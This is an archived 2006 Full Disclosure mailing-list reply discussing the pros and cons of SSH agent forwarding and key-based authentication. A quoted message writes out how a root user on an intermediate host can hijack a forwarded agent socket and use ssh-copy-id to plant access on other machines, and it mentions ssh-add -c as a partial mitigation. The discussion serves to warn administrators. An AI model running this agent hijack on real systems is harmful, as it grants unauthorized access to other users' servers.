Home page logo

fulldisclosure logo Full Disclosure mailing list archives

Re: Tech Tip: An Illustrated Guide to SSH Agent Forwarding
From: Raj Mathur <raju () linux-delhi org>
Date: Sat, 25 Feb 2006 00:13:02 +0530

Hash: SHA1

"Andrew" == Andrew McGill <andrew2005 () ledge co za> writes:

    Andrew> Here's something you missed in the "Cons" section of agent
    Andrew> forwarding:

    Andrew>   lala () local: ssh-add lala () local: (enter key) lala () local:
    Andrew> ssh -A customer

    Andrew>     lala () customer: ssh remote

    Andrew>       lala () remote: sleep 86400

    Andrew> And while you are sleeping: root () customer does this:
    Andrew> export SSH_AUTH_SOCK=`find /tmp -user lala -name 'agent.*'
    Andrew> | head -1` ssh-copy-id lala () remote ssh-copy-id lala () local
    Andrew> ssh-copy-id lala () othercustomer ssh-copy-id lala () lalaland

    Andrew> (Oops) (that's a lot easier than subverting ssh to insert
    Andrew> something evil into the stream that will hack into the
    Andrew> remote)

    Andrew> If there are untrusted machines involved you may prefer
    Andrew> this:

    Andrew>   ssh-add -c

    Andrew> Note that ssh-agent does not identify the origin of
    Andrew> requests for authentication (a bug?), so its confirmation
    Andrew> is not fail-safe.

You can also add in the Pros of using key-based authentication:

If you have multiple administrators for a server farm, grant them only
key-based authentication.  Then when an administrator leaves the
company (or is redeployed within the organisation), you only need to
delete her key from authorized_keys and she's immediately locked out
of the servers.  The older method was to change the password on each
server (painful) and communicate the batch of new passwords to the
remaining administrators (insecure).


- -- Raju
- -- 
Raj Mathur                raju () kandalaya org      http://kandalaya.org/
       GPG: 78D4 FC67 367F 40E2 0DD5  0FEF C968 D0EF CC68 D17F
                      It is the mind that moves
Version: GnuPG v1.4.2 (GNU/Linux)
Comment: Processed by Mailcrypt 3.5.8 <http://mailcrypt.sourceforge.net/>

Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]